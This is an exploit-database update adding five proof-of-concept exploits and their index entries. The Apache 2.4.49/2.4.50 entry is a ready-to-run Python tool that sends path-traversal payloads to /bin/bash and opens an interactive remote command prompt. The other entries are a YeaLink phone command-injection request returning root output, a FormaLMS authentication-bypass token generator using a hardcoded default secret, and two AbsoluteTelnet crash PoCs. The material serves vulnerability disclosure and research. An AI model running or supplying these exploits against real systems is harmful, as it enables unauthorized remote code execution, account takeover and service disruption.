DB: 2021-11-12

5 changes to exploits/shellcodes

AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
FormaLMS 2.4.4 - Authentication Bypass

exploits/hardware/webapps/50509.txt

@@ -0,0 +1,44 @@
+# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
+# Date: 11-10-2021
+# Exploit Author: tahaafarooq
+# Vendor Homepage: https://www.yealink.com/
+# Version: 53.84.0.15
+# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
+
+Description:
+
+Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
+
+POC:
+
+POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 49
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+Origin: http://xxx.xxx.xxx.xxx
+Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=9a83d24461329a130
+Connection: close
+
+cmd=; id;&token=1714636915c6acea98
+
+-------------------------------------------------
+
+HTTP/1.1 200 OK
+Content-Type: text/html
+Connection: close
+Date: Wed, 10 Nov 2021 14:20:23 GMT
+Server: embed httpd
+Content-Length: 82
+
+<html>
+<body>
+	<div id="_RES_INFO_">
+            uid=0(root) gid=0(root)
+        </div>
+</body>
+</html>

exploits/multiple/webapps/50512.py

@@ -0,0 +1,121 @@
+# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
+# Date: 11/11/2021
+# Exploit Author: Valentin Lobstein
+# Vendor Homepage: https://apache.org/
+# Software Link: https://github.com/Balgogan/CVE-2021-41773
+# Version: Apache 2.4.49/2.4.50 (CGI enabled)
+# Tested on: Debian GNU/Linux
+# CVE : CVE-2021-41773 / CVE-2021-42013
+# Credits : Lucas Schnell
+
+
+#!/usr/bin/env python3
+#coding: utf-8
+
+import os
+import re
+import sys
+import time
+import requests
+from colorama import Fore,Style
+
+
+header = '''\033[1;91m
+
+     ▄▄▄       ██▓███   ▄▄▄       ▄████▄   ██░ ██ ▓█████     ██▀███   ▄████▄  ▓█████
+    ▒████▄    ▓██░  ██▒▒████▄    ▒██▀ ▀█  ▓██░ ██▒▓█   ▀    ▓██ ▒ ██▒▒██▀ ▀█  ▓█   ▀
+    ▒██  ▀█▄  ▓██░ ██▓▒▒██  ▀█▄  ▒▓█    ▄ ▒██▀▀██░▒███      ▓██ ░▄█ ▒▒▓█    ▄ ▒███
+    ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█  ▄    ▒██▀▀█▄  ▒▓▓▄ ▄██▒▒▓█  ▄
+    ▓█   ▓██▒▒██▒ ░  ░ ▓█   ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒   ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
+    ▒▒   ▓▒█░▒▓▒░ ░  ░ ▒▒   ▓▒█░░ ░▒ ▒  ░ ▒ ░░▒░▒░░ ▒░ ░   ░ ▒▓ ░▒▓░░ ░▒ ▒  ░░░ ▒░ ░
+    ▒   ▒▒ ░░▒ ░       ▒   ▒▒ ░  ░  ▒    ▒ ░▒░ ░ ░ ░  ░     ░▒ ░ ▒░  ░  ▒    ░ ░  ░
+    ░   ▒   ░░         ░   ▒   ░         ░  ░░ ░   ░        ░░   ░ ░           ░
+''' + Style.RESET_ALL
+
+
+if len(sys.argv) < 2 :
+    print( 'Use: python3 file.py ip:port ' )
+    sys.exit()
+
+def end():
+    print("\t\033[1;91m[!] Bye bye !")
+    time.sleep(0.5)
+    sys.exit(1)
+
+def commands(url,command,session):
+    directory = mute_command(url,'pwd')
+    user = mute_command(url,'whoami')
+    hostname = mute_command(url,'hostname')
+    advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
+    command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
+    command = f"echo; {command};"
+    req = requests.Request('POST', url=url, data=command)
+    prepare = req.prepare()
+    prepare.url = url
+    response = session.send(prepare, timeout=5)
+    output = response.text
+    print(output)
+    if 'clear' in command:
+        os.system('/usr/bin/clear')
+        print(header)
+    if 'exit' in command:
+        end()
+
+def mute_command(url,command):
+    session = requests.Session()
+    req = requests.Request('POST', url=url, data=f"echo; {command}")
+    prepare = req.prepare()
+    prepare.url = url
+    response = session.send(prepare, timeout=5)
+    return response.text.strip()
+
+
+def exploitRCE(payload):
+    s = requests.Session()
+    try:
+        host = sys.argv[1]
+        if 'http' not in host:
+            url = 'http://'+ host + payload
+        else:
+            url = host + payload
+        session = requests.Session()
+        command = "echo; id"
+        req = requests.Request('POST', url=url, data=command)
+        prepare = req.prepare()
+        prepare.url = url
+        response = session.send(prepare, timeout=5)
+        output = response.text
+        if "uid" in output:
+            choice = "Y"
+            print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
+            print("[!] Sortie:\n\n" + Fore.YELLOW + output )
+            choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
+            if choice.lower() in ['','y','yes']:
+                while True:
+                    commands(url,command,session)
+            else:
+                end()
+        else :
+            print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
+    except KeyboardInterrupt:
+        end()
+
+def main():
+    try:
+        apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
+        apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
+        payloads = [apache2449_payload,apache2450_payload]
+        choice = len(payloads) + 1
+        print(header)
+        print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
+        while choice >= len(payloads) and choice >= 0:
+            choice = int(input('[~] Choice : '))
+            if choice < len(payloads):
+                exploitRCE(payloads[choice])
+    except KeyboardInterrupt:
+            print("\n\033[1;91m[!] Bye bye !")
+            time.sleep(0.5)
+            sys.exit(1)
+
+if __name__ == '__main__':
+    main()

exploits/multiple/webapps/50513.py

@@ -0,0 +1,51 @@
+# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
+# Google Dork: inurl:index.php?r=adm/
+# Date: 2021-11-10
+# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
+# Vendor Homepage: https://formalms.org
+# Software Link:  https://formalms.org
+# Version: <= 2.4.4
+# Tested on: Linux
+# CVE : CVE-2021-43136
+
+# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.
+
+# Analysis:
+https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
+
+# Nuclei template:
+https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml
+
+#!/usr/bin/env python
+
+"""
+
+The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
+
+"""
+
+import sys
+import time
+import hashlib
+
+secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
+
+ def help():
+
+  print(f"Usage: {sys.argv[0]} username target_url")
+
+  sys.exit()
+
+
+if len(sys.argv) < 3:
+
+    help()
+
+user, url = (sys.argv[1], sys.argv[2])
+t = str(int(time.time()) + 5000)
+token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with default secret: {final_url}")
+token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with empty secret: {final_url}")

exploits/windows/dos/50510.py

@@ -0,0 +1,37 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> Connection -> SSH1 & SSH2"
+# 5. - Paste the characters of txt file to "Authentication -> Username"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "Your Email Address (optional)"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+    file = open("exploit.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC not created")

exploits/windows/dos/50511.py

@@ -0,0 +1,36 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> DialUp Connection
+# 5. - Paste the characters of txt file to "DialUp  -> phone"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "license name"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+    file = open("exploit.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC not created")

files_exploits.csv

@@ -6803,6 +6803,8 @@ id,file,description,date,author,type,platform,port
 50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
 50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
+50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -44606,3 +44608,6 @@ id,file,description,date,author,type,platform,port
 50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
 50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
 50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
+50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
+50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
+50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,